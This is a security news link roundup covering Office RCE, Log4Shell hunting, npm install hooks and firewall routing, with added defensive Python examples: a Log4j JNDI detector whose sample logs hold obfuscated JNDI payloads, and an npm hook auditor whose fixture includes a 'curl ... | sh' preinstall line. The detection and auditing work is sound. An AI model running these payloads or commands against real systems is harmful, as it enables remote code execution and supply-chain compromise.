Scanning millions of domains and compromising email supply chains
By utilising the free domain scan tooling created here at CanIPhish, you can visualise the full extent of your email sender and receiver supply chains.
https://caniphish.com/phishing-resources/blog/compromising-australian-supply-chains-at-scale
Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
The attackers make a request to the exploit CAB file with an XMLHttpRequest.
https://billdemirkapi.me/unpacking-cve-2021-40444-microsoft-office-rce/
Trojanized dnSpy app drops malware cocktail on researchers, devs
Hackers targeted cybersecurity researchers and developers this week in a sophisticated malware campaign distributing a malicious version of dnSpy.
https://www.bleepingcomputer.com/news/security/trojanized-dnspy-app-drops-malware-cocktail-on-researchers-devs/
Get expert training on advanced hunting
Get more expert training with L33TSP3AK: Advanced hunting in Microsoft 365 Defender, a webcast series for analysts looking to expand their technical knowledge and practical skills in conducting security investigations using advanced hunting in Microsoft 365 Defender.
https://docs.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-expert-training
Log4Shell exploitation and hunting on VMware Horizon – PwnDefend
In the standard VMware logs you will largely not see exploitation.
https://www.pwndefend.com/2022/01/07/log4shell-exploitation-and-hunting-on-vmware-horizon-cve-2021-44228/
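Because the standard VMware logs will largely not show the exploitation, hunting has to run against whatever does record the inbound request (a reverse proxy, WAF or web-tier access log). The following is an added example and not code from PwnDefend: a small Python detector that peels the usual Log4j lookup obfuscation (${lower:x}, ${upper:x}, ${anything:-x}, percent-encoding) before matching for a JNDI lookup. The access-log-style lines, IP addresses and hostnames are constructed for the demonstration.

```python
import re
import urllib.parse

# Constructed access-log-style lines (not from any real Horizon deployment).
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /portal/webclient/index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET /portal/ HTTP/1.1" 200 "${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.7:1389/b}"',
    '10.0.0.9 - - "GET /portal/ HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/c}"',
    '10.0.0.9 - - "GET /portal/?x=%24%7Bjndi%3Adns%3A%2F%2Fx.example.net%7D HTTP/1.1" 200 "curl/7.79"',
    '10.0.0.9 - - "GET /portal/ HTTP/1.1" 200 "${env:HOME}"',  # a lookup, but not JNDI: must not alert
]

# ${lower:x} / ${upper:x} -> x   (case lookups used to hide the literal "jndi")
_CASE_RE = re.compile(r'\$\{(?:lower|upper):([^{}])\}', re.IGNORECASE)
# ${prefix:key:-default} -> default   (empty/unknown lookups whose default value is the payload)
_STRIP_RE = re.compile(r'\$\{[^${}]*?:-([^{}]*)\}')
# The thing we are actually hunting for, once the string is de-obfuscated.
_JNDI_RE = re.compile(r'\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\s*:', re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Repeatedly URL-decode and collapse Log4j lookup tricks until the string stops changing."""
    for _ in range(max_rounds):
        new = urllib.parse.unquote(text)
        new = _CASE_RE.sub(lambda m: m.group(1), new)
        new = _STRIP_RE.sub(lambda m: m.group(1), new)
        if new == text:
            return new
        text = new
    return text


def find_jndi(line):
    """Return (scheme, normalized_line) if the line carries a JNDI lookup, else None."""
    norm = normalize(line)
    m = _JNDI_RE.search(norm)
    if not m:
        return None
    return m.group(1).lower(), norm


def hunt(lines):
    """Return [(line_number, scheme)] for every line that carries a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = find_jndi(line)
        if found:
            hits.append((n, found[0]))
    return hits


if __name__ == "__main__":
    for n, scheme in hunt(SAMPLE_LOGS):
        print(f"line {n}: JNDI lookup via {scheme} -> {find_jndi(SAMPLE_LOGS[n - 1])[1]}")
```

The normalization loop is what makes the difference in practice: a plain grep for "jndi:" catches only the second sample line, while the nested-lookup and percent-encoded variants would pass it. Any hit should be pivoted into process and network telemetry from the Horizon host, since the page notes the application logs themselves do not show the exploitation.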
cybersecsi/RAUDI: A repo to automatically generate and keep updated a series of Docker images through GitHub Actions.
RAUDI automatically generates and keeps updated a series of Docker images through GitHub Actions for tools that are not provided by the developers.
https://github.com/cybersecsi/RAUDI
Execute NPM securely by separating the script execution from the install phase.
https://medium.com/cider-sec/npm-might-be-executing-malicious-code-in-your-ci-without-your-knowledge-e5e45bab2fed
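Separating the two phases in CI means installing with npm ci --ignore-scripts and then running only the lifecycle hooks you have reviewed, via an explicit npm rebuild of those packages. The following is an added example and not code from the Cider Security post: a Python auditor that walks a node_modules tree, reports every package declaring an install-phase hook, and turns a reviewed allowlist into the npm rebuild commands to run afterwards. The package tree, package names and the allowlist are constructed for the demonstration; the allowlist name ALLOWLIST is an assumption, not an npm feature.

```python
import json
import tempfile
from pathlib import Path

# Lifecycle hooks npm runs on a dependency during the install phase
# (prepare applies to git dependencies; the rest run for registry packages too).
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed sample node_modules tree: one clean package, one package with a
# postinstall hook, one scoped native addon, and a nested dependency with a preinstall hook.
SAMPLE_TREE = {
    "node_modules/left-pad/package.json": {"name": "left-pad", "version": "1.3.0"},
    "node_modules/evil-dep/package.json": {
        "name": "evil-dep", "version": "0.0.1",
        "scripts": {"postinstall": "node setup.js", "test": "jest"},
    },
    "node_modules/@scope/native-addon/package.json": {
        "name": "@scope/native-addon", "version": "2.0.0",
        "scripts": {"install": "node-gyp rebuild"},
    },
    "node_modules/evil-dep/node_modules/inner/package.json": {
        "name": "inner", "version": "0.1.0",
        "scripts": {"preinstall": "curl http://203.0.113.9/x | sh"},
    },
}

# Hypothetical reviewed allowlist: packages whose hooks we accept running in CI.
ALLOWLIST = {"@scope/native-addon"}


def install_hooks(pkg_json_path):
    """Return {hook: command} for install-phase scripts declared in one package.json."""
    with open(pkg_json_path, encoding="utf-8") as fh:
        data = json.load(fh)
    scripts = data.get("scripts") or {}
    return {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}


def audit_node_modules(project_root):
    """Collect (package_name, hook, command) for every installed package with install hooks.

    Handles scoped (@scope/name) and nested (a/node_modules/b) packages; the project's own
    top-level package.json is deliberately skipped, since those scripts are the ones you run on purpose."""
    findings = []
    for pkg_json in Path(project_root).rglob("package.json"):
        parent = pkg_json.parent
        if parent.parent.name == "node_modules":
            name = parent.name
        elif parent.parent.name.startswith("@") and parent.parent.parent.name == "node_modules":
            name = f"{parent.parent.name}/{parent.name}"
        else:
            continue  # a fixture or sub-directory inside a package, not a package root
        for hook, cmd in install_hooks(pkg_json).items():
            findings.append((name, hook, cmd))
    return sorted(findings)


def rebuild_commands(findings, allowlist):
    """After `npm ci --ignore-scripts`, run hooks only for allowlisted packages via `npm rebuild <name>`.

    Returns (commands_to_run, packages_flagged_for_review)."""
    allowed = sorted({name for name, _, _ in findings if name in allowlist})
    flagged = sorted({name for name, _, _ in findings if name not in allowlist})
    return [f"npm rebuild {name}" for name in allowed], flagged


def build_sample_tree(base):
    """Write the constructed SAMPLE_TREE to disk under base."""
    for rel, content in SAMPLE_TREE.items():
        p = Path(base) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(json.dumps(content), encoding="utf-8")


def demo():
    """Build the sample tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return audit_node_modules(tmp)


if __name__ == "__main__":
    findings = demo()
    for name, hook, cmd in findings:
        print(f"{name}: {hook} -> {cmd}")
    cmds, flagged = rebuild_commands(findings, ALLOWLIST)
    print("run:", cmds)
    print("review before allowing:", flagged)
```

In a pipeline the auditor runs right after npm ci --ignore-scripts and before the build step, so that a new or changed install hook in a transitive dependency fails the job for review rather than executing silently.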
DarkCoderSc/PowerRemoteDesktop: Remote Desktop entirely coded in PowerShell.
As the name suggests, Power Remote Desktop is a Remote Desktop application entirely coded in PowerShell.
https://github.com/DarkCoderSc/PowerRemoteDesktop
Linux kernel exploit development
This series on Linux kernel exploit development follows the same pattern, working through exploit mitigations using pwn.
https://breaking-bits.gitbook.io/breaking-bits/exploit-development/linux-kernel-exploit-development
You can use the default admin password :). Up to now, I have tried 3 Audio Door Locks and all of them have default passwords.
https://sockpuppets.medium.com/bypassing-door-passwords-4004b8d7995
Announcing Personal Identifiable Information detection and remediation in AWS Glue
Personal Identifiable Information detection and remediation in AWS Glue is now available in preview.
https://aws.amazon.com/about-aws/whats-new/2022/01/aws-glue-preview-pii-detection-remediation/
If the firewall only sees the return packets, they are dropped as the firewall has no prior state information about the flow.
https://medium.com/sensorfu/lopsided-routing-a-stealthy-hole-punch-into-fortigate-6f25b2805b9c
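The drop described here is ordinary connection tracking: state is created only when the firewall sees the packet that opens a flow, and reply packets are matched against that state. The following is an added example and not code from SensorFu: a toy Python model of a stateful firewall, run once with a symmetric handshake and once with lopsided routing, where the outbound SYN left by another path and only the SYN-ACK comes back through the firewall. Only the drop behaviour stated above is modelled; the FortiGate-specific findings of the article are not. Addresses and ports are constructed.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str  # TCP flags as letters, e.g. "S" (SYN), "SA" (SYN-ACK), "A" (ACK)


class StatefulFirewall:
    """Toy connection tracker: inside hosts may open flows; outside traffic is only
    accepted as the reply to a flow whose opening packet this firewall actually saw."""

    def __init__(self, inside_prefix):
        self.inside_prefix = inside_prefix      # e.g. "10.0.0." marks the protected side
        self.state = set()                      # 4-tuples of flows opened from inside
        self.log = []                           # (packet, verdict) for inspection

    def _from_inside(self, pkt):
        return pkt.src.startswith(self.inside_prefix)

    def filter(self, pkt):
        key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        reverse = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if self._from_inside(pkt):
            # A bare SYN from inside opens a new flow and creates state.
            if "S" in pkt.flags and "A" not in pkt.flags:
                self.state.add(key)
            verdict = "ACCEPT" if key in self.state else "DROP"
        else:
            # Inbound packets are accepted only as replies to a tracked outbound flow.
            verdict = "ACCEPT" if reverse in self.state else "DROP"
        self.log.append((pkt, verdict))
        return verdict


def symmetric_handshake(fw):
    """Both legs cross the firewall: the SYN creates state, the SYN-ACK matches it."""
    syn = Packet("10.0.0.5", 40000, "198.51.100.1", 443, "S")
    synack = Packet("198.51.100.1", 443, "10.0.0.5", 40000, "SA")
    return fw.filter(syn), fw.filter(synack)


def lopsided_handshake(fw):
    """The SYN left via another path; only the return SYN-ACK reaches this firewall,
    which has no state for the flow and therefore drops it."""
    synack = Packet("198.51.100.1", 443, "10.0.0.6", 40001, "SA")
    return fw.filter(synack)


if __name__ == "__main__":
    fw = StatefulFirewall("10.0.0.")
    print("symmetric:", symmetric_handshake(fw))
    print("lopsided :", lopsided_handshake(fw))
    for pkt, verdict in fw.log:
        print(f"{verdict:6} {pkt.src}:{pkt.sport} -> {pkt.dst}:{pkt.dport} [{pkt.flags}]")
```

The practical check this suggests is to verify that every path a protected host can use to reach the outside returns through the same firewall; otherwise the state table and the packets it is supposed to judge never meet.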
redcanaryco/redcanary-ebpf-sensor: Red Canary's eBPF Sensor
To build this project run docker-compose run --rm ebpf make all.
https://github.com/redcanaryco/redcanary-ebpf-sensor
Google Acquires Siemplify
We're looking forward to welcoming the Siemplify team to Google Cloud and working with them to help security operations teams accomplish so much more in defense of their organizations.
https://cloud.google.com/blog/products/identity-security/raising-the-bar-in-security-operations
NOBELIUM's EnvyScout infection chain goes in the registry, targeting embassies
Unlike the previously described NOBELIUM spear phishing attacks disclosed by Microsoft, the downloaded ISO files no longer contained a malicious DLL and a shortcut meant to launch that DLL. In both cases, the ISO simply embeds a malicious HTML Application file, which executes the rest of the exploitation chain.
https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/